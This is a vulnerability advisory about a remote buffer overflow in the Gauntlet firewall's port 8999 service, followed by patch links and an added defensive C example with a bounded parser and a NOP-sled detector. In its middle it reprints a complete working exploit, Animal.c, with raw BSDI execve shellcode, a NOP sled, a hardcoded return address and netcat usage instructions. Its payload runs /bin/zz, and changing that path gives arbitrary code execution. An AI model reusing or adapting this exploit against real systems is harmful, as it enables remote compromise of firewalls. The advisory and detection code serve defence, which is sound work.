Vulnerability
Gauntlet

Affected
Gauntlet

Description
This was posted to the Gauntlet User list. The claim is that there is no exploit "in the wild" and that the only holders of the code are NAI and Garrison Tech, and they don't plan to release it, which is not true (see below). Of course, nobody else will figure it out, right? Nice to have a buffer overflow in a firewall in any case. Below is proof of concept code. Since this exploit exists, it gives us new fear that there is probably more to come. Security vendors need to pay better attention to the code they put out. Pix, Checkpoint, Gauntlet, all have exploits that came out this year.

So here it is, script kiddies don't bother, this code won't help you. It is written to run a test file called /bin/zz. Just throw a file called zz in /bin on the gauntlet firewall and chmod it to 700. Inside the zz file you should have it do something where it will leave you a log. Here is a real simple example.

#!/bin/sh
echo "IT RAN" > /tmp/TEST

And here comes the exploit:

/*
 * Animal.c
 *
 * Remote Gauntlet BSDI proof of concept exploit.
 * Garrison technologies may have found it, but I am the
 * one who released it. ;) I do not have a Sparc or I would
 * write up the Solaris one too. If you have one, please
 * make the changes needed and post it. Thanks.
 *
 * Script kiddies can go away, this will only execute a file
 * named /bin/zz on the remote firewall. To test this code,
 * make a file named /bin/zz and chmod it to 700.
 * I suggest for the test you just have the zz file make a note
 * in syslog or whatever makes you happy.
 *
 * This code is intended for proof of concept only.
 *
 * _Gramble_
 * Hey BuBBles
 *
 * To use:
 * # Animal | nc <address> 8999
 */
#include <stdio.h>
#include <string.h>             /* strlen */

char data[364];                 /* NOP sled + return address, NUL terminated */

int main(void)
{
    int i;
    char shelloutput[80];

    /* just borrowed this execute code from another exploit:
     * a BSDI execve stub followed by the path it runs */
    unsigned char shell[] =
        "\x90"
        "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
        "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
        "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00";

    /* 264 bytes of NOP sled ... */
    for (i = 0; i < 264; i++)
        data[i] = 0x90;

    /* ... then the return address 0xefbf9b30, written byte by byte
     * (little-endian), and a terminator so printf("%s") stops here */
    data[i] = 0x30; i++;
    data[i] = 0x9b; i++;
    data[i] = 0xbf; i++;
    data[i] = 0xef; i++;
    data[i] = 0x00;

    /* copy the shellcode into its own NUL-terminated buffer */
    for (i = 0; i < (int)strlen((const char *)shell); i++)
        shelloutput[i] = shell[i];
    shelloutput[i] = 0x00;

    /* the request line the daemon on port 8999 reads: "<id>.<url>", where
     * the overlong "url" carries the sled, the return address and the shellcode */
    printf("10003.http://%s%s", data, shelloutput);
    return 0;
}

Solution
Patches are available from http://www.tis.com/support/patchpage.html; the patch you need is cyber.patch for whatever version you are currently running. There is no released patch for Gauntlet 4.1; however, if you refer to the advisory you can implement the workaround detailed in that advisory. Network Associates released a patch to address this issue. See http://www.pgp.com/jump/gauntlet_advisory.asp for further information.
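The post shows the payload but not the other side of it: what a request to port 8999 looks like on the wire, and what check in the receiving daemon would have stopped it. The example below is added here and is not the poster's code nor anything from NAI or Garrison Tech. It builds a request with Animal.c's exact layout (the "10003.http://" prefix, 264 NOP bytes, a little-endian return address, then the payload), parses it the way a patched handler should (bounded copy into a fixed buffer, reject what does not fit), and runs a wire-level check that flags the sled and the non-printable shellcode bytes. The 256-byte handler buffer, the 32-byte sled threshold, and the stand-in payload bytes are assumptions; Gauntlet's real internals are not described on this page.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Request shape used by Animal.c: "<id>.<url>" where the "url" is a NOP sled,
 * a little-endian return address, then the shellcode. The 264/4 split and the
 * prefix are Animal.c's; the two sizes below are illustrative assumptions. */
#define REQ_PREFIX      "10003.http://"
#define SLED_LEN        264
#define URL_MAX         256   /* assumed size of the fixed stack buffer a naive handler would use */
#define SLED_ALERT_LEN  32    /* assumed detection threshold for a run of 0x90 bytes */

/* Constructed stand-in for the shellcode (not the real bytes): a few
 * opcode-looking bytes followed by the path Animal.c's shellcode executes. */
static const unsigned char demo_payload[] = "\x31\xc0\xb0\x3b/bin/zz";
#define DEMO_PAYLOAD_LEN (sizeof demo_payload - 1)

/* Build a request with Animal.c's layout into out. Returns the number of bytes
 * written, or 0 if outcap is too small. ret_addr is written little-endian, the
 * same order Animal.c writes its four address bytes by hand. */
size_t build_request(unsigned char *out, size_t outcap, uint32_t ret_addr,
                     const unsigned char *payload, size_t payload_len)
{
    size_t plen = strlen(REQ_PREFIX);
    size_t total = plen + SLED_LEN + 4 + payload_len;
    unsigned char *p;

    if (total > outcap)
        return 0;
    memcpy(out, REQ_PREFIX, plen);
    memset(out + plen, 0x90, SLED_LEN);
    p = out + plen + SLED_LEN;
    p[0] = (unsigned char)(ret_addr & 0xff);
    p[1] = (unsigned char)((ret_addr >> 8) & 0xff);
    p[2] = (unsigned char)((ret_addr >> 16) & 0xff);
    p[3] = (unsigned char)((ret_addr >> 24) & 0xff);
    memcpy(p + 4, payload, payload_len);
    return total;
}

/* Bounded parse of "<id>.<url>": copies the url into url[urlcap] only if it
 * fits, terminator included. Returns 0 on success, -1 if the request is
 * malformed, -2 if the url part is too long for the buffer. This is the check
 * the overflow relies on being absent; it illustrates the fix, it is not
 * Gauntlet's own code. */
int parse_request_bounded(const unsigned char *req, size_t len,
                          unsigned long *id, char *url, size_t urlcap)
{
    size_t i = 0;
    unsigned long v = 0;

    while (i < len && req[i] >= '0' && req[i] <= '9') {
        v = v * 10 + (unsigned long)(req[i] - '0');
        i++;
    }
    if (i == 0 || i >= len || req[i] != '.')
        return -1;
    i++;                                   /* skip the '.' */
    if (len - i >= urlcap)                 /* would not leave room for the NUL */
        return -2;
    memcpy(url, req + i, len - i);
    url[len - i] = '\0';
    *id = v;
    return 0;
}

/* Wire-level check on the url part: a run of 0x90 bytes at least SLED_ALERT_LEN
 * long, or any byte outside printable ASCII, is not something a URL contains.
 * Returns 1 when the request looks like Animal.c's payload, 0 otherwise. */
int looks_like_overflow(const unsigned char *req, size_t len)
{
    size_t i = 0, run = 0;

    while (i < len && req[i] != '.')
        i++;
    for (i = i + 1; i < len; i++) {
        if (req[i] == 0x90) {              /* count the sled separately */
            if (++run >= SLED_ALERT_LEN)
                return 1;
            continue;
        }
        run = 0;
        if (req[i] < 0x20 || req[i] > 0x7e) /* raw shellcode byte in a "URL" */
            return 1;
    }
    return 0;
}

int main(void)
{
    unsigned char req[512];
    char url[URL_MAX];
    unsigned long id = 0;
    size_t n = build_request(req, sizeof req, 0xefbf9b30u, demo_payload, DEMO_PAYLOAD_LEN);

    printf("request bytes: %zu\n", n);
    printf("bounded parse result: %d\n", parse_request_bounded(req, n, &id, url, sizeof url));
    printf("looks like overflow: %d\n", looks_like_overflow(req, n));
    return 0;
}
```

The two checks are deliberately independent: the bounded parse is what the daemon itself should do (and is the shape of fix a cyber.patch would have to contain), while looks_like_overflow is what a sensor in front of port 8999 can do without knowing the daemon's buffer size at all. Either one alone stops this particular payload; a sled that is shorter than the threshold, or a payload encoded to stay printable, would get past the sensor but not past the bounded copy.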